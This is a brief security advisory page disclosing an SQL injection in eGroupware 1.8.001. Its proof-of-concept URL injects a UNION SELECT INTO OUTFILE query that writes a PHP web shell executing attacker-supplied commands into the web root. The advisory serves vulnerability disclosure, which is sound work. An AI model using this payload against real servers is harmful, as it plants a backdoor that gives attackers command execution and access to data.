Home
Consulting
Exploits
Advisories
Software
Papers
Contact

Vulnerability Advisory

Software Vulnerability
eGroupware 1.8.001 SQL Injection
Threat Tested On Date
4/5
Windows Vista + XAMPP 4/6/2011
Description
A SQL injection vulnerability in eGroupware 1.8.001 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.
Proof of Concept
http://localhost/egroupware/phpgwapi/js/dhtmlxtree/samples/with_db/loaddetails.php?id=0%20and%201=0%20UNION%20SELECT%20'%3C?php%20system($_GET[%22CMD%22]);%20?%3E','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23

Copyright © 2021 AutoSec Tools LLC